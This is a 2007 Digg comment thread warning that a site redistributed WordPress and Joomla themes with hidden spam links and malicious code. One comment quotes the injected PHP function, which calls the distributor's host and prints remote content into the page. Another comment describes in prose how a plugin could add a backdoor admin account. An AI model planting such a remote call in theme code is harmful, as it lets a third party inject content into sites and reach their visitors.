digg

Join DiggAbout

Discover the best of the web!
Learn more about Digg by taking the tour.

WARNING! WordPress & Joomla; your theme might have malicious code

5thirtyone.com — Templates Browser is re-distributing WordPress & Joomla blog themes which contain hidden spam and malware / phishing links. If you've downloaded a theme from Templates Browser, check your source code and re-download the theme(s) from the original author(s).

Bury
show profanity settings
expand all
  • Mc_Carter, on 10/10/2007, -17/+37too bad no one ever sees wordpress themes because the sites go down after five diggs.
    • NinjaBoy, on 10/10/2007, -3/+27I hate this generalization. My site has survived several diggs without a hickup. People don't see sites hosted on ***** ass servers.
      • jcaino, on 10/10/2007, -7/+2i've witnessed digg traffic take down a wordpress site on a dedicated server that was only hosting said website.

        intel dual core 3.6Ghz w/ 4GB of ram.

        there are tweaks and things one can adjust (using caching, for one) to help wordpress get by, however, in extreme cases, it will still die.
        • Burn, on 10/10/2007, -6/+2Ahh so it was a P4, that would be why ;)
        • NinjaBoy, on 10/10/2007, -0/+8Its really about the number of DB calls your site makes. If ever user take 40 DB calls to render the page its going down way faster than one making 6.
      • apotropaic, on 10/10/2007, -1/+4Its a good observation of wordpress sites overall, most are hosted on ***** ass server as you say, and even then some still go down on dedicated servers. You say its all about the number of calls you make to the DB (duh!) but what you aren't mentioning is that a very small % of wordpress users even know what the word optimization means! So if your wordpress site didn't go down on a digg effect, grats, but I can't say thats the norm.
    • Ashex, on 10/10/2007, -0/+13That's a myth, the primary reason that wordpress blogs go down is because the huge amount of database requests crash mysql, if it isn't that, it's because every time the page is loaded, wordpress generates the page from scratch everytime. Using a couple simple plugins, such as wp-cache will easily prevent this, along with enabling the built-in cache feature in wordpress.
      I've done these things to prevent my site from going down in the event that it gets dugg, I'm fairly confident it won't
  • igeoffi, on 10/10/2007, -4/+10Template Browsers has been taken down.
  • NinjaBoy, on 10/10/2007, -4/+11ok if you want a wordpress theme try going to http://themes.wordpress.org
  • visualweb, on 10/10/2007, -2/+2Templates Browsers appears to be back up, perhaps a note to the domain registrar (namecheap) about their "best practices" might illicit some action.
  • markwilcox, on 10/10/2007, -6/+5One of the reasons I write and design my own.
  • koick, on 10/10/2007, -15/+4WARNING! WordPress users, your site will crash if more than 2 people visit within an hour.
    • abandonedhero, on 10/10/2007, -2/+6WARNING DIGGERS! Making stupid comments WILL get you dugg down like this tosser.
  • wisdomdigger, on 10/10/2007, -4/+0There must be a way to look for the malicious codes in functions.php or anywhere in the template. That's sad news. I customarily use free templates for my Joomla sites, with some tweaking of course. Someone should think of ways how to remove those malicious codes.
    • Figs, on 10/10/2007, -0/+8Read the source code and see what it does?
    • imablackguy, on 10/10/2007, -0/+2The obvious response to this would be to not upload the extra functions.php/remove whatever additional call?

      Someone should just do a quick diff against the original theme and the TB theme.
  • rxbbx, on 10/10/2007, -1/+3This took long.. i am surprised it never happened before..
  • BlackCastle, on 10/10/2007, -5/+3Just (2007/08/03 06:16 UTC) checked the theme I use: compared with the original author: yep, it's infected. Downloaded again from templatesbrowser: yes, still infected. Sombody know how to spell DDOS?
    • phyzome, on 10/10/2007, -0/+0If a whole bunch of Digg users held down CTRL-F5 while viewing the site, it could DDoS the site.
  • DevDad, on 10/10/2007, -3/+1I always wondered why they were paying for AdWords advertisements with no monetization on the site.
  • hexydes, on 10/10/2007, -4/+3Bah, that's why real men only make their templates from scratch. ;)
  • imablackguy, on 10/10/2007, -0/+6It calls this:
    -

    function credits()
    {
    $url = "http://1.templatesbrowser.com/wp.php?" .
    "url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
    $check = @fsockopen("1.templatesbrowser.com", 80, $errno, $errstr, 3);
    if($check)
    {
    @readfile($url);
    fclose($check);
    }
    }
  • lordatlas, on 10/10/2007, -8/+1I hope Wank writes about it. - http://wank.wordpress.com
  • OBKenobi, on 10/10/2007, -6/+2Coincidentally, check the Joomla site, there are a couple of very nice new templates released from Rockettheme and Yootheme.
  • masonba2000, on 10/10/2007, -5/+4I am in ur wordpress, malicizing your code
  • depi, on 10/10/2007, -4/+1If you are looking for free and good looking Wordpress themes you can also look here: http://wp-themes.erikgyepes.com
  • shinon, on 10/10/2007, -2/+1Does that mean it's malicious GPL code now?
  • deathproof, on 10/10/2007, -2/+5What is Malicious code? I'm sure I'll get dugg down for asking such a question instead of getting an answer.
  • zeejay, on 10/10/2007, -2/+1Malicious code? From a generic site that lets you download installable code/freeware? No!!!
  • redwallhp, on 10/10/2007, -1/+3Uh, some of the best blogs on the web are Wordpress. Smashing Magazine is run off Wordpress, and you've seen all the diggs they get! I think those Wordpress devs need to get going and add wp-cache-like functionality to Wordpress instead of requiring a plugin. They should also improve the admin panel.
  • xamox, on 10/10/2007, -3/+2Good thing I use drupal.
  • Mar1in, on 10/10/2007, -1/+1Yow! I can see the MPack crowd making malicious templates as yet another way to try to get established onto more PCs. MPack, if you don't know, is _commecial_ malware. The operators of an MPack site try to get their mal-links on google, basically anywhere they can, so that when people browsing the web hit on a mal-link they get infected. The infection allows the MPack operator to gather information off of the PC, in hopes of getting credit card #'s and banking information, etc.
  • iapx, on 10/10/2007, -3/+0Drupal, as Joomla and Wordpress use direct PHP code for it's template, enabling anyone to forge malware, spyware or worse on the template itself, and they are both totally unsecure.
    Any Drupal Module or Template could also request any data directly from the DB, including user accounts, and do whatever if wants to, and it's easy to hide in obfuscated uncommented code (as many templates and modules are!).

    This is the unsafe way to do serious PHP Project
  • headzoo, on 10/10/2007, -1/+2You really don't know what kind of crazy code might be in those templates and plugins you're installing. They could easily create backdoors to give people access to your site. I could put out a plugin for WP that creates a full admin user, and emails me the URL to your blog, so I can then go log in and do whatever I want.
    There's really a hundred different ways, but most people don't think twice when installing any ol' theme or plugin that they found on the web.
    • isdereks, on 10/10/2007, -0/+2This paranoia can be applied to anything that you find and download on the internet.
  • Sushubh, on 10/10/2007, -2/+1oh i remember downloading a template from a recommended template source. it had 3 hidden links to adult sites. i complained to the wordpress people. they took down that template and made it a point to check all the templates for such links...
  • Brajeshwar, on 10/10/2007, -1/+2This sucks, I found my theme bring re-distributed too without the credit and the malicious code in the "funcstions.php". I have done what I can to spread the word against downloading from TemplateBrowser - http://www.brajeshwar.com/2007/templatebrowser-is-pirating-your-wordpress-themes/
  • seoluv, on 10/10/2007, -0/+1Check it out.
    Check your WordPress themes for malicious codes!
    Aileen Apolo - Where Did Our SeoLuv Go ?
    Google Country Consultant
    Benj Arriola & The Crying Game
  • kabalyero, on 10/10/2007, -0/+0I make my own themes and template. Check out my http://www.kabalyero.com WP Theme ;)
  • and5rey, on 11/03/2007, -1/+0If anyone is using my themes, feel free to download the original files from my site: http://www.wpmix.com/
  • kureselisinma, on 12/24/2007, -0/+0http://www.kuresel-isinma.org http://www.m-s-n.org http://www.biddinglinkdirectory.net http://www.globalwarmingvideos.org
  • matu666, on 01/13/2008, -0/+1the template broswer site is down at its root domain but if you put /wordpress-themes after it you still get access to the WP themes
    bad news
    take this site down
    I use Joomla myself
  •  

    Login or register to add a comment

    Create a new account or login to join in the conversation on Digg. You'll also be able to Digg stories to help promote things you like.


© Digg Inc. 2008 — Content posted by Digg users is dedicated to the public domain.
DIGG, DIGG IT, DUGG, DIGG THIS, Digg graphics, logos, designs, page headers, button icons, scripts, and other service names are the trademarks of Digg Inc.